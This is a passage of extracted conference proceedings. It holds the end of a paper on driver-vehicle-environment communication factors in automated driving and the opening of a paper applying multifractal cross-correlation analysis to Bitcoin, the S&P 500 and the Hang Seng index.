5.2
7
3
3
6
2
2
2.13.4. Control system failure
7.6
6.1
7.4
7
4
4
6
2
2
2.14. Vehicle overload
4.8
4.4
3.6
4
4
4
2
1
1
2.15. Number of passengers
5.6
4.8
4.7
3
3
3
1
1
1
2.16. Finding foreign objects on the road
6.2
4.4
6.4
4
4
4
2
2
2
Tactical level group (vehicle component management) 3.1. Position of governing bodies
4.4
4.0
4.1
4
4
4
1
1
1
3.2. Type of drive
3.1
3.1
3.0
4
4
4
1
1
1
(continued)
308
V. Lytovchenko and M. Pidhornyy Table 1. (continued)
Name of group/factor
Respondent Weight
Probability
Significance
Weight
Expert Probability
Significance
Weight
Master key Probability
Significance
3.3. Number of drive wheels
3.2
3.0
3.1
3
3
3
1
1
1
3.4. Position of the center of mass of the vehicle
3.0
2.8
2.5
2
2
2
1
1
1
3.5. Overall dimensions of the vehicle
2.6
3.9
3.9
4
4
4
1
1
1
3.6. Engine failure
5.2
4.2
4.8
6
4
6
8
2
10
3.6.1. Inconsistency of energy source for traffic (diesel fuel, gasoline, etc.)
6.8
4.4
6.6
8
4
8
8
2
10
3.6.2. Breakdowns of the fuel or energy supply system
7.7
7.1
7.2
8
2
8
8
2
9
3.6.3. Loss of ignition and start of movement of engine elements
6.8
6.1
6.0
4
4
4
2
2
2
3.6.4. Insufficient power for a specific vehicle
4.1
2.1
2.8
4
1
4
2
2
2
3.6.5. Engine overload
5.5
5.1
5.3
5
5
5
5
1
3
3.6.6. Periodic replacement of lubricating fluids and mechanical components was not performed
7.8
4.6
4.8
8
4
8
1
1
3
3.6.7. Not high-quality combustion gases
2.1
1.8
1.9
2
2
2
1
1
2
3.6.8. A sharp push on the accelerator pedal by the driver
1.2
2.2
3.1
2
2
2
1
3
1
Continuation of Table 1 1
2
3
4
5
6
7
8
9
10
3.7. Vehicle transmission failure
5.3
4.8
5.3
8
3
8
8
2
7
(continued)
Optimization of the Communicative Process in the System
309
Table 1. (continued) Name of group/factor
Respondent Weight
Probability
Significance
Weight
Expert Probability
Significance
Weight
Master key Probability
Significance
3.7.1. Inconsistency of gear shifting
5.4
4.1
4.1
6
4
6
6
2
5
3.7.2. Improper engine grip
4.9
4.2
4.8
5
3
4
6
2
6
3.7.3. Overload on the driving wheels
5.4
4.7
5.6
6
3
3
4
2
4
3.7.4. Insufficient lubricant level
3.2
1.1
2.8
6
1
5
2
1
2
3.7.5. A sharp change in gear ratio
5.8
4.3
4.2
5
2
4
5
2
4
3.7.6. Control system malfunction
5.5
4.8
5.5
7
4
7
8
1
7
3.8. Chassis failure
5.9
5.2
5.8
6
4
6
8
2
7
3.8.1. Power flow transmission gap
4.2
3.7
4.2
4
4
4
5
2
5
3.8.2. Damping system failure
6.3
3.4
5.4
8
2
7
5
2
5
3.8.3. Hitting an obstacle
4.8
3.3
6.1
7
3
5
1
2
2
3.9. Brake system failure
7.9
6.8
7.6
8
2
8
5
2
6
3.10. Steering system failure
4.1
4.1
4.2
8
2
8
5
2
6
3.11. Trailer control
4.2
4.1
4.2
4
4
4
1
3
2
3.12. Application of windshield wipers
2.1
3.6
1.0
2
5
2
1
8
2
3.13. Application of optical devices
2.3
3.8
1.2
2
6
2
1
9
2
3.14. Application of sound devices
0.8
2.4
1.0
4
4
4
1
8
2
Environmental change group 4.1. Road coverage
5.1
3.6
4.8
6
10
6
6
10
10
4.1.1. Smooth
3.1
8.8
3.6
1
7
8
2
7
9
4.1.2. Rough
5.0
5.4
5.0
8
2
8
6
3
9
4.1.3. With potholes
5.2
5.2
5.3
6
4
6
6
4
8
4.1.4. With obstacles
3.3
3.3
3.4
8
2
7
6
4
8
4.1.5. Dry
2.6
3.2
3.4
2
8
8
2
8
8
(continued)
310
V. Lytovchenko and M. Pidhornyy Table 1. (continued)
Name of group/factor
Respondent Weight
Probability
Significance
Weight
Expert Probability
Significance
Weight
Master key Probability
Significance
4.1.6. Wet
6.6
2.5
6.1
7
3
6
4
2
9
4.1.7. Sludge (wet snow)
7.4
2.1
3.3
8
2
6
5
2
9
4.1.8. Ice
7.8
3.1
5.5
8
1
8
6
1
9
4.2. Spatial position of the vehicle
4.1
7.9
6.3
4
10
7
1
10
10
4.3. Curvature of the trajectory
8.8
4.6
7.7
6
8
8
2
7
7
4.4. Nebula and humid air
5.3
5.0
5.5
7
2
7
2
4
4
4.5. Direction and speed of air flow
2.8
3.0
3.2
3
3
3
3
2
2
4.6. Lack of road signs
3.0
3.7
3.4
7
2
7
2
2
2
4.7. Lack of road markings
2.8
3.3
3.5
7
2
7
2
2
2
4.8. Road lighting
4.5
4.5
4.8
8
3
8
2
10
1
4.8.1. Daylight
6.3
5.4
5.3
3
3
3
2
8
2
4.8.2. Evening and morning light
2.3
3.3
3.3
4
4
4
3
2
2
Continuation of Table 1 1
2
3
4
5
6
7
8
9
10
4.8.3. Night lighting
5.1
6.0
5.8
8
6
8
3
1
2
4.8.4. Intensity and direction of illumination
2.3
3.3
3.3
7
7
7
3
10
2
4.9. Contamination of vehicles
4.4
4.2
4.2
4
4
4
1
2
2
The conducted researches are presented by diagrams of results of estimation of factors, both by respondents (Fig. 1), and experts (Fig. 2). In addition, the diagram of estimations of the master key (Fig. 3) is resulted. According to these results, the influence of factors related to the technical condition of the vehicle and the psychophysical condition of the driver prevails. Therefore, communication and interactions in the D-V subsystem have an advantage over the V-E and D-E subsystems in the whole D-V-E system. Given the level of automation, the introduction of communication technologies should be carried out at the third, fourth and fifth levels [14, 15]. Table 1 highlights the factors that are directly related to the communication links of the D-V-E system, a significant impact on the avoidance of internal system conflicts and the psychophysical state of the driver. Difficulty and probability, in the table, are constant criteria for all levels of automation, as they are of constant importance. Their values are listed in Table 1, in the list of values of the master key for each factor. Table 2 shows an estimate from 0 to 10, the impact of factors on the D-V-E system by changing the levels of automation
Optimization of the Communicative Process in the System
Fig. 1. Diagram of evaluation of respondents’ survey results
311
312
V. Lytovchenko and M. Pidhornyy
Fig. 2. Diagram of the results of factor assessment by experts
Optimization of the Communicative Process in the System
Fig. 3. Master key evaluation chart
313
314
V. Lytovchenko and M. Pidhornyy Table 2. Estimates of communicative factors of influence in the D-V-E system
Name of group/factor
Significance Significance Significance 3rd level 4th level 5th level
1
2
3
4
Strategic level group (route planning) 1.1. Road accident
9
7
6
1.2. Gestures of the regulator or other drivers
2
2
1
1.3. Inexperience of the driver of the vehicle
4
3
0
1.4. Changing the direction of movement of other 1 vehicles
1
0
1.5. Violation of traffic rules
7
7
8
1.5.1. Alcohol or drug intoxication
8
7
6
1.5.2. Exceeding the allowable speed
2
2
1
1.5.3. Mobile phone conversations
1
1
1
1.5.4. Conversations with passengers
1
1
0
1.5.5. Smoking while driving
1
1
0
1.5.6. Eating while driving
1
1
0
1.5.7. Management of electronic means while driving
2
1
1
1.5.8. Listening to music
1
1
1
1.6. Changes in the psychophysical condition and 6 health of the driver
6
5
1.6.1. Fatigue
3
2
1
1.6.2. Drowsiness
1
1
1
1.6.3. Dizziness
8
7
6
1.6.4. Anxiety
1
1
1
1.6.5. Decreased observation
1
1
1
1.6.6. The effect of drugs
1
1
1
1.6.7. The effect of alcohol and drugs
9
7
6
1.6.8. Blinding
3
2
1
1.6.9. Occurrence of a stressful situation
1
1
1
Operational level group (route movement) 2.1. Poor visibility
2
1
1
2.2. The presence of sound signals
1
1
1
2.3. Abrupt changes in the direction of movement 2
1
1 (continued)
Optimization of the Communicative Process in the System
315
Table 2. (continued) Name of group/factor
Significance Significance Significance 3rd level 4th level 5th level
2.4. Negligent attitude to the technical condition of the vehicle
2
1
1
Continuation of Table 2 1
2
3
4
2.5. Traffic accident
8
7
6
2.5.1. With the participation of vehicles
8
8
8
2.5.2. Without the participation of the vehicles
6
4
2
2.6. Occurrence of an emergency situation
9
8
8
2.6.1 Observation error
6
4
1
2.6.2. Wrong decision or action
5
3
2
2.6.3. Insufficient reaction
5
3
2
2.6.4 An unpredictable situation
5
2
1
2.7. Unknown location for the driver
1
1
1
1
1
1
3.2. Sharp pressure on the accelerator pedal by the 1 driver
1
1
Tactical level group (vehicle component management) 3.1. Position of governing bodies
3.3. Vehicle transmission failure
7
6
6
3.3.1. Inconsistency of gear shifting
5
4
1
3.3.2. A sharp change in gear ratio
3
2
1
3.4. Application of optical devices
2
1
0
3.5. Application of sound devices
2
1
0
4.1. Road coverage
8
7
4
4.1.1. Smooth
7
4
3
Environmental change group
4.1.2. Rough
7
5
4
4.1.3. With potholes
7
5
5
4.1.4. With obstacles
7
5
5
4.1.5. Dry
7
4
2
4.1.6. Wet
7
4
2
4.1.7. Sludge (wet snow)
8
5
4
4.1.8. Ice
8
5
4 (continued)
316
V. Lytovchenko and M. Pidhornyy Table 2. (continued)
Name of group/factor
Significance Significance Significance 3rd level 4th level 5th level
4.2. Curvature of the trajectory
6
4
2
4.3. Nebula and humid air
3
1
0
4.4. Lack of road signs
2
1
0
4.5. Lack of road markings
2
1
0
4.6. Road lighting
1
1
1
4.6.1. Daylight
2
1
0
4.6.2. Evening and morning light
2
1
0
4.6.3. Night lighting
2
1
0
4.6.4. Intensity and direction of illumination
2
1
1
4.7. Contamination of vehicles
2
1
1
of the vehicle. The given table focuses on the factors that should be combined with communication technologies to avoid conflict situations described previously, during the operation of the D-V-E system.
4 The Results of the Application of Communication Technologies in D-V-E System We use sensation as the simplest cognitive process of reflection in the human brain of certain qualities and properties of objects due to the action of the stimulus on the analyzer. The most common are: visual, auditory and tactile. We see the level of automation of the D-V-E system in reducing the entropy of the human senses (Fig. 4) involved in the management of the D-V-E system and creating for the driver the information flow of control and analytical data [20]. Optimization of the D-V-E system is achieved by creating stimuli for objects of artificial origin, which are equated to stimuli per person. Due to this, the reaction and adaptation of the automatic system is as close as possible to the nature of human action. We will form communicative processes in the D-V-E system and present them in Table 3. In this table, the communicative factors listed in Table 2 are divided into several levels. Each level is summarized according to the characteristics and properties of factors. Factors affect the objects of the D-V-E system in different ways, creating various communicative processes, which are formed in Table 3. Complementing the structural scheme of distribution of control signals [21], communicative processes will obtain a general scheme of optimization of the D-V-E system, where the arrow indicates the optimized operation of the automated vehicle (Fig. 5). This publication is a continuation of the authors’ scientific research and is the basis for the creation of a neural network of an intelligent vehicle control system.
Optimization of the Communicative Process in the System
Fig. 4. Diagram of estimates of communicative factors of the D-V-E system
317
318
V. Lytovchenko and M. Pidhornyy Table 3. Communicative processes in the D-V-E system
Object
Levels Material
Functional
Parametric
The driver
human body
approach to vehicles, landing on vehicles, vehicle management, analysis of road events, decision-making in dynamic events and change of route
physical and chemical properties (volume, weight, geometric parameters, temperature, pressure, etc.), age, driving experience and psychophysical condition
Vehicle
material and technical means in general
movement on the set trajectory, movement in the set direction and space, interaction with objects of transport system, transportation of people and material objects, creation of ergonomic and comfortable conditions for the driver
physical and chemical properties, individual, public, transportation services and service
Environment transport infrastructure pavement, signs, and natural environment markings, irregularities, lighting, conditions and obstacles to movement
physical and chemical properties, illumination, relief and quality of the road surface
Fig. 5. Scheme of optimization of the D-V-E system
According to the provided scheme, communication links are formed, aimed at avoiding a number of conflicts, which are described above. Communicative processes according to the proposed scheme take place with the least human influence on the D-V-E system. This approach to automation and autonomy does not contradict the levels of SAE standards [15].
Optimization of the Communicative Process in the System
319
5 Conclusions The existing transport infrastructure is being upgraded to enable the full integration of intelligent vehicles while remaining relevant to conventional vehicle. Therefore, the current paradigms of driving a vehicle will have to change with the growth of their level of intellectualization and autonomy. The development of modern information technologies in transport is gradually moving to the realization of the connection between the psychophysical state of the driver and the process of driving the vehicle. And the introduction of network capabilities of the Internet expands the communication capabilities of the D-V-E system. Thanks to the application of the communicative processes, proposed by the authors in the article to the D-V-E systems, the system’s response and adaptation approach the driver’s adaptation, which reduces a number of conflicts and optimizes the functionality of both the system and each of its objects. Based on the results of the survey of the respondents, an evaluation of the influencing factors was obtained according to the three criteria mentioned above. According to the indicated results, the influence of factors relates to the technical condition of the vehicle and the psychophysical condition of the driver prevails. The following factors have been obtained that are directly related to the communication links of the D-V-E system, have a significant impact on the avoidance of intra-system conflicts and the psychophysical state of the driver. Therefore, the communicative connection and interactions in the D-V subsystem have an advantage over those in the V-E and D-E subsystems in the integral D-V-E system. The level of influence of objects on each other changes, which is permissible during the operation of the D-V-E system. The entropy of the involved organs of the driver’s sense when controlling the D-V-E system is reduced and the creation of an information flow of data of a control and analytical nature for the driver, and the reaction and adaptation of the automatic D-V-E system is as close as possible to the nature of human (driver) actions. In this way, an increase in the level of automation of transport systems is achieved, which is created and does not disrupt the connection between the objects of the D-V-E system as a whole. And the scheme of optimizing the process of operating an automated vehicle obtained as a result of the research is the basis for creating a neural network of an intelligent vehicle control system in the future. Acknowledgements. Authors of publication express their gratitude to the Cherkasy SRFC of the MIA of Ukraine. Personal thanks to the director of the Cherkasy SRFC of the MIA of Ukraine, Aksionov Vasyl Vasylovych.
References 1. Facial Recognition Is Already Here: These Are the 30+ US Companies Testing the Technology. https://www.cbinsights.com/research/facial-recognition-technology-us-corporations/ 2. Brummelen, J. Van, O’Brien, M., Gruyer, D., Najjaran, H.: Autonomous vehicle perception: the technology of today and tomorrow. Transp. Res. Part C: Emerg. Technol. (2018) 3. Hummel, T.: BMW, daimler seal self-driving tech partnership. Automotive News Europe (2019). https://www.europe.autonews.com/automakers/bmw-daimler-seal-self-dri ving-techpartnership
320
V. Lytovchenko and M. Pidhornyy
4. Wang, X.: Driver-centered Human-machine interface design: design for a better takeover experience in level 4 automated driving. The master thesis (2020) 5. Types of Vehicle Connectivity. https://blog.rgbsi.com/7-types-of-vehicle-connectivity 6. Martínez-Díaz, M., Soriguera, F.: Autonomous vehicles: theoretical and practical challenges. Transp. Res. Proc. 33, 275–282 (2018). https://doi.org/10.1016/j.trpro.2018.10.103. ISSN 2352-1465 7. Garcia, M., et al.: A tutorial on 5G NR V2X communications. IEEE Commun. Surv. Tutor. 1 (2021). https://doi.org/10.1109/COMST.2021.3057017 8. Kunda, N., Lopotukha, E.: Application of information technologies in transport. InterConf. 84, 403–410 (2021). https://doi.org/10.51582/interconf.7-8.11.2021.040 9. The Future of the In-Vehicle Experience. https://www.cbinsights.com/research/report/in-veh icle-experience-technology-future/ 10. Curley, P.: An environmentally aware auto – teaching the car about the world around it. SAE Technical Paper. 2008-21-0050 (2008) 11. Coles, Z.A., Beyerl, T.A., Augusma, I., Soloiu, V.: From sensor to street – intelligent vehicle control systems. Pap. Publ.: Interdisc. J. Undergr. Res. 5(9) (2016) 12. Migal, V.D., Maidan, H.: Intellectual systems in technical operation of cars: monograph (2018) 13. Research on the key technologies of intelligent vehicle control Wenming Cheng Automotive Engineering institute, Jiangxi University of Technology, Nanchang 330098, China 3rd International Conference on Management, Education, Information and Control (MEICI) (2015) 14. SAE_International. SAE Levels of Driving Automation (2013). http://cyberlaw.stanford.edu/ loda 15. SAE Standard J3016 “Sae international taxonomy and definitions for terms related to on-road motor vehicle automated driving systems,” levels of driving automation (2014) 16. Van den Beukel, A.P., Van der Voort, M.C.: Evaluation of ADAS with a supported-driver model for desired allocation of tasks between human and technology performance. In: Meyer, G., Valldorf, J., Gessner, W. (eds.) Advanced Microsystems for Automotive Applications 2009, pp. 187–208. Springer, Berlin (2009). https://doi.org/10.1007/978-3-642-00745-3_13 17. Ramm, S.A.: Framework of 10 characteristics and perceptions of natural-feeling driver-car interaction from the contextual inquiry naturalness framework for driver-car interaction. A thesis submitted for the degree of Doctor of Philosophy. Department of Design, CEDPS, Brunel University (2018) 18. The Autonomous Vehicle Global Study, Abridged Version in Slides. https://www.ptolemus. com/research/the-autonomous-vehicle-global-study-2017-abridged-version-in-slides/ 19. Kalinina, I.O., Gozhiy, O.P., Musenko, G.O.: Consideration of competence of experts in methods of multicriteria analysis in problems of rational choice. Sci. Works Petro Mohyla Black Sea State Univ.. Ser.: Comput. Technol. 179, 116–123 (2012) 20. Lytovchenko, V.V., Kreyda, A.M., Pidhornyy, M.V.: Information model of driving a vehicle with a continuously variable transmission. In: Automation-2017: XXIV International Conference on Automatic Control, Kyiv, pp. 209–210 (2017) 21. Lytovchenko, V.V., Pidhornyy, M.V.: Choosing a method of designing a vehicle control system. In: Proceedings of All-Ukrainian Scientific and Technical Conference on Modern Trends in the Development of Mechanical Engineering and Transport, pp. 144–148. KrNU, Kremenchuk (2020)
Computer Modeling and Information Systems in Economics
The Analysis of Multifractal Cross-Correlation Connectedness Between Bitcoin and the Stock Market Andrii Bielinskyi1 , Vladimir Soloviev1,3(B) , Victoria Solovieva2 , Andriy Matviychuk1,3 , and Serhiy Semerikov1 1 Department of Computer Science and Applied Mathematics, Kryvyi Rih State Pedagogical
University, Kryvyi Rih, Ukraine [email protected] 2 Department of Information Technologies and Modelling, State University of Economics and Technology, Kryvyi Rih, Ukraine 3 Department of Mathematical Modelling and Statistics, Kyiv National Economic University named after Vadym Hetman, Kyiv, Ukraine
Abstract. In this study, we examine the multifractal cross-correlation relationships between stock and cryptocurrency markets. The measures of complexity which can serve as indicators (indicators-precursors) in both markets are retrieved from Multifractal Detrended Cross-Correlation Analysis. On the example of the S&P 500 and HSI stock indices that are used most by investors to gauge the status of the economy in the world, and the cryptocurrency Bitcoin, which mostly determines the existence of the crypto market, we assess the variation of multifractality and correlations in both markets. Using the sliding window approach, we localize their dynamics across time and indicate a high degree of non-linearity with dominant anti-persistency during crash periods for each index. The existence of periods with high and low cross-correlations for stock and crypto markets provides prospects for reliable trading with several pairs of assets and effective diversification of their risks. Keywords: Stock market · crypto market · cross-correlations · multifractal analysis · crash · complex systems · indicator-precursor
1 Introduction After the COVID-19 pandemic and during the Russia-Ukraine war [1, 7, 8, 24, 25, 28, 37, 46, 53], decentralized finance with its one of the most popular representatives Bitcoin (BTC) gained rapid popularity [2, 10, 17, 19, 50]. These innovations gained attention from policymakers, financial regulators, scientists, and ordinary people, who despite the regulatory laws in their country, continue to help people using the benefits of decentralized financial operation and analyze it from the perspective of complex systems [15, 47, 57]. © The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 E. Faure et al. (Eds.): ITEST 2022, LNDECT 178, pp. 323–345, 2023. https://doi.org/10.1007/978-3-031-35467-0_21
324
A. Bielinskyi et al.
Since approximately June 2021, the correlation between stock and crypto markets started an upward trend. In particular, this can be connected to the growing number of financial instruments in the crypto market, which makes investors behave in a similar way as to the stock market. Since BTC is still developing digital asset, the fluctuations in it are violent and further dynamics begins to be speculated. Thus, correlations between stock and crypto markets vary across time, demonstrating non-linear dependence. One of the possible approaches to measure long-term memory (correlations) in time series, which was called rescaled range analysis (R/S), was proposed by Hurst [22]. Lo found that classical R/S analysis was sensitive to short-term memory of a system, which may lead to bias error of nonstationary time series [32]. Considering the limitations of R/S analysis, Peng et al. [40] developed detrended fluctuation analysis (DFA). Kantelhardt extended classical DFA to a multifractal DFA that gives the possibility to study long-term memory of both small and large fluctuations using a range of statistical moments [27]. Interesting for us methods were developed by Podobnik and Stanley [41] and then extended to multifractal version by Zhou [56], that gives the possibility to study long-range cross-correlations between two nonstationary time series such as crypto and stock markets. Classical multifractal DFA (MF-DFA) and multifractal extension of detrended cross-correlation analysis (MF-DCCA) have been widely applied to such complex financial systems as foreign exchange markets, stock markets, crude oil market, carbon and commodity markets, futures, investment strategies, and even for Twitter happiness sentiment, mass and new media [9, 13, 31, 33–36, 54, 55]. The aim of this study is to study the degree of cross-correlation between one of the most capitalized and developed stock markets of the USA and China represented by the Standard and Poor’s 500 (S&P 500) and the Hang Seng (HSI) with the cryptocurrency market represented by BTC. All data we take from Yahoo! Finance [48] for the period from September 15, 2014 to May 22, 2022 to make it comparable with the data range of BTC dates provided by the mentioned data source. Also, we present the indicators (indicators-precursors) of crash phenomena in stock and crypto markets based on MFDCCA.
2 Multifractal Detrended Cross-Correlation Analysis Multifractal detrended cross-correlation analysis that was derived from standard DCCA gives multifractal characteristics derived from power-law cross-correlations of time series [56]. This approach modifies standard detrended covariance fluctuation func{xi |i = 1, 2, . . . , N } tion to q th order. For its calculations, we take two time series and {yi |i = 1, 2, . . . , N } and find their cumulative profiles X (i) = ik=1 [xk − x] and Y (i) = ik=1 yk − y , where · is an average of an analyzed series. Then, by dividing the series into Ns ≡ int(N /s) non-overlapping segments v of equal length s, we explore how evolves the covariance of the residuals of two systems: f 2 (v, s) =
1 s {X [(v − 1)s + i] −X˜ v (i) × Y [(v − 1)s + i] − Y˜ v (i) , i=1 s
where X˜ v (i) and Y˜ v (i) are m-order polynomials for each sub-series v.
(1)
The Analysis of Multifractal Cross-Correlation Connectedness
325
Since N is usually not an integer multiple of s, we may neglect the last part of a time series. Thus, we have to repeat the procedure of division from the end of the series and obtain 2Ns sub-series v (v = 1, . . . , 2Ns ). Then, we apply the equation above to the reversed segments: v (i) ˜ {X − − 1)s + i]− X [N (v s 1 . f 2 (v, s) = (2) i=1 × Y [N − (v − 1)s + i] − Y˜ v (i) s As the result, we calculate the fluctuation function Fq (s) for the combination of various scales s and statistical moments q: ⎧ 1/q ⎨ 1 2Ns f 2 (v, s)q/2 , q = 0, v=1 2N s (3) Fq (s) = 2Ns ⎩ exp 1 ln f 2 (v, s) , q = 0. 4Ns
v=1
By analyzing the log-log plots of Fq (s) versus s, we can get the scaling behavior of the fluctuation function. Particularly, if time series are power-law cross-correlated, then Fq (s) ∝ shxy (q) , where hxy (q) represents a multifractal generalization of power-law cross-correlation Hurst exponent. For q = 2, it is the cross-correlation scaling exponent, which is similar to the known Hurst exponent H [22]. This extension of the Hurst exponent works in the same way: 1. If hxy (2) > 0.5, the cross-correlations between time series are presented to be persistent: an increase (a decrease) in one time series is followed by an increase (a decrease) in another time series. 2. If hxy (2) < 0.5, the cross-correlations between time series are presented to be antipersistent: an increase in one time series is likely to be followed by a decrease in the other time series. 3. If hxy (2) ≈ 0.5, both time series follow a random walk, i.e., there are no correlations between them. 4. If hxy (2) > 1, both time series are presented to be highly correlated and non-stationary. Values of q emphasize the density of small (large) fluctuations. If those values are negative, we make an accent on scaling properties of small fluctuations. For positive values, scaling properties of the large magnitudes dominate. Generally, if our multifractal characteristics do not depend on q values, the studied time series is presented to be monofractal. Except for the cross-correlation Hurst exponent, using the standard DCCA algorithm, we can compute the standard DCCA cross-correlation coefficient ρDCCA (s) between time series [52]: ρDCCA (s) =
2 FDCCA (s) . FDFA{x} (s) × FDFA{y} (s)
(4)
326
A. Bielinskyi et al.
2 In (4), FDCCA (s) is the detrended covariance function between x and y from DCCA; FDFA (s) is the standard DFA [40] and −1 ≤ ρDCCA (s) ≤ 1. In a similar way to the classical correlation coefficient, ρDCCA = 1 means that time series are positively correlated and co-move synchronically; ρDCCA = −1 denotes that time series move anti-persistently; ρDCCA = 0 presents that there is no correlation between two time series. For further calculations, through the multifractal (Rényi) mass exponent τ (q) = qhxy (q)−1 [38], we define the singularity strength (Hölder exponent) through a Legendre transform [18, 20, 21]:
dhxy (q) (5) α(q) = hxy (q) + q dq
and the singularity (multifractal) spectrum [18, 21]: f (α) = q α(q) − hxy (q) + 1.
(6)
If critical events dominate in our system, the singularity spectrum has a long-left tail that indicates the dominance of large events. The right-tailed multifractal spectrum indicates sensitivity to events of small magnitude. The symmetrical spectrum represents an equal distribution of small and large fluctuations. Except for those characteristics that were presented before, we would like to calculate the width of the multifractal spectrum which can be defined as α = αmax − αmin .
(7)
In (7), αmin and αmax are the ends of f (α). The wider α is, the more complex structure, the more uneven distribution we have, and the more violent fluctuations on the surface of our time series. On the contrary, smaller multifractal width indicates that the time series are uniformly distributed. Thus, their structure is much simpler. Except α of the whole spectrum, we can calculate widths of its left (L) and right (R) tails: L = α0 − αmin , (8) R = αmax − α0 for which α0 = argmaxα f (α). The wider one of this width is, the more uneven distribution we have. Greater value of L points on the wider right tail of the multifractal, which corresponds to higher complexity due to large fluctuations. On the contrary, if R becomes wider, we have higher complexity due to fluctuations with small magnitude. If both values are equal, both small and large fluctuations are uniformly distributed. Such asymmetry (skewness) is better reflected by the long tail type S [23]: S = R − L
(9)
and asymmetry coefficient A [14, 16, 39]: A=
L−R . L+R
(10)
The Analysis of Multifractal Cross-Correlation Connectedness
327
Negative value for A would highlight the dominance of small fluctuations (rightsided asymmetry). Consequently, positive values for A would denote an increase of heterogeneity for large fluctuations (left-sided asymmetry). When A = 0, the spectrum is presented to be symmetric. For S < 0, we have wider left tail, which tells about insensitiveness of a time series to small fluctuations, while for S > 0, we expect to have less fluctuated time series. Another option is to find the difference between the maximum and the minimum probability subsets f [11, 12, 51]: f = f (α min ) − f (α max ).
(11)
For f < 0, we have the higher chance of occurring decreasing direction, while for f > 0 we have the opposite relation.
3 Experiments and Empirical Results Further, for measuring the degree of multifractal cross-correlations between S&P 500, HSI, and BTC, we present the comparative dynamics of the described indicators calculated with the usage of the sliding window approach [5, 6] along with the studied series. The presented measures are calculated for the standardized returns of S&P 500, HSI, and BTC, where returns are calculated as G(t) = ln x(t + t) − ln x(t) ∼ = [x(t + t) − x(t)]/x(t)
(12)
for t = 1, . . . , N − 1. Here, N is the length of the initial time series, and the standardized version of G can be calculated as g(t) ∼ = [G(t) − G]/σ with σ representing standard deviation of G; t – time lag (in our case t = 1); · · · – average over the time period under study. Figures below include such measures as: • the cross-correlation multifractal function Fq (s), the generalized cross-correlation Hurst exponent hxy (q), the multifractal cross-correlation Rényi exponent τ (q), and the multifractal cross-correlation spectrum f (α); • the DCCA correlation coefficient ρDCCA for a long-term (s = 250 days − ρlast ) and midterm (s = 125 days − ρmiddle ); • the generalized cross-correlation Hurst exponent (hxy (2)); • the width of multifractal spectrum α; • the singularity exponents α0 , αmin , αmean , αmax ; • the widths of left (L) and right (R) tails of f (α); • the long tail type S; • the asymmetry coefficient A; • the height of the multifractal spectrum f . We expect our indicators to behave in a particular way during the critical event: increase or decrease. Cross-correlation measures are estimated with: • the sliding window of 250 days and step size of 1 day; • m = 2 for fitting local trends in Eqs. (1) and (2);
328
A. Bielinskyi et al.
• the values of q ∈ [−5; 5] with a delay 0.1 to have a better view of scales with small and large fluctuation density; • the time scale s varies from 10 to 1000 days for the whole time series and from 10 to 250 days for the sliding window method. In Fig. 1 multifractal characteristics of the pair S&P 500-BTC are presented.
Fig. 1. The log-log plot of the cross-correlation fluctuation function Fq (s) versus time scale s (a), the generalized cross-correlation Hurst exponent hxy (q) versus the order q (b), the multifractal cross-correlation mass exponent τ (q) versus the order q (c), and the multifractal cross-correlation spectrum f (α) versus the cross-correlation singularity exponent α for the pair S&P 500-BTC
In Fig. 1, a the fluctuation function Fq (s) follows the power-law, and it appears to be wide for s < 100. In Fig. 1, b we see that hxy (q) appears to be non-linear. For q < 0, the generalized cross-correlation Hurst exponent responds precisely persistent dynamics, whereas for large fluctuations (q > 0) between two indices we should expect anti-persistent dynamics.
The Analysis of Multifractal Cross-Correlation Connectedness
329
In Fig. 1, c the multifractal Rényi exponent remains mostly linear for q < 0, which is an indicator of mostly monofractal cross-correlation dynamics of small fluctuations, while for q > 0, cross-correlations dynamics demonstrates higher multifractality. Figure 1, d demonstrates that f (α) is broad, which is an indicator of highly complex non-linear dynamics of two systems. Moreover, this spectrum is skewed toward left. We can conclude that multifractal cross-correlation structure formed by S&P 500 and BTC has higher sensitivity to larger local fluctuations. In Fig. 2 multifractal characteristics of the pair HSI-BTC are presented.
Fig. 2. The log-log plot of the cross-correlation fluctuation function Fq (s) versus time scale s (a), the generalized cross-correlation Hurst exponent hxy (q) versus the order q (b), the multifractal cross-correlation mass exponent τ (q) versus the order q (c), and the multifractal cross-correlation spectrum f (α) versus the cross-correlation singularity exponent α for the pair HSI-BTC
In Fig. 2 we can see that multifractal cross-correlations for HSI-BTC are presented to be weak. The fluctuation function Fq (s) in Fig. 2, a follows power-law, but in general, it appears to be narrow for all scales. In Fig. 2, b we see that hxy (q) is presented to be non-linear. For q < 0, the generalized exponent hxy (q) > 0.59, which implies that small fluctuations between two indices behave persistently. For large fluctuations (q > 0), the generalized exponent hxy (q) > 0.55, which shows that even large fluctuations between two markets remain correlated.
330
A. Bielinskyi et al.
In Fig. 2, c the multifractal Rényi exponent remains mostly linear across different statistical moments q, which demonstrates that most of the cross-correlation multifractal behavior between two markets is weak. Figure 2, d demonstrates that f (α) is not concentrated in one point, which proves that cross-correlation dynamics of the studied systems demonstrates multifractal characteristics. The spectrum demonstrates a precisely uniform shape, which indicates a relatively uniform contribution of large and small fluctuations. However, compared to other studied pairs, the spectrum of HSI-BTC looks narrow. We conclude that for these indices, over a range of q and s values, multifractal cross-correlations are presented to be insignificant. Next, in Fig. 3 we present multifractal characteristics of two stock indices – S&P 500 and HSI.
Fig. 3. The log-log plot of the cross-correlation fluctuation function Fq (s) versus time scale s (a), the generalized cross-correlation Hurst exponent hxy (q) versus the order q (b), the multifractal cross-correlation mass exponent τ (q) versus the order q (c), and the multifractal cross-correlation spectrum f (α) versus the cross-correlation singularity exponent α for the pair S&P 500-HSI
The Analysis of Multifractal Cross-Correlation Connectedness
331
In Fig. 3 we can see that multifractal cross-correlations for S&P 500-HSI are presented to be strong. The fluctuation function Fq (s) in Fig. 3, a follows power-law, and it appears to be wide for a range of many scales. In Fig. 3, b we see that hxy (q) is presented to be non-linear. For q < 0, the generalized exponent hxy (q) demonstrates that small fluctuations between two stocks represent persistent dynamics, whereas for large fluctuations (q > 0), the generalized cross-correlation Hurst exponent hxy (q) has the tendency to be less than 0.50. In Fig. 3, c the multifractal Rényi exponent remains mostly non-linear across different statistical moments q, which demonstrates that most of the cross-correlation behavior of two markets demonstrates high degree of multifractality. Figure 3, d demonstrates that f (α) is the broadest among other spectrums, which implies that multifractal cross-correlation dependence in the stock market has to be the biggest. According to the presented spectrum, fluctuations with small and large magnitudes have approximately equal influence on each other. We conclude that for these indices, over a range of q and s values, multifractal cross-correlations are presented to be significant. In Fig. 4 we would like to present the plots of ρDCCA versus time scale s for S&P 500-BTC, HSI-BTC, and S&P 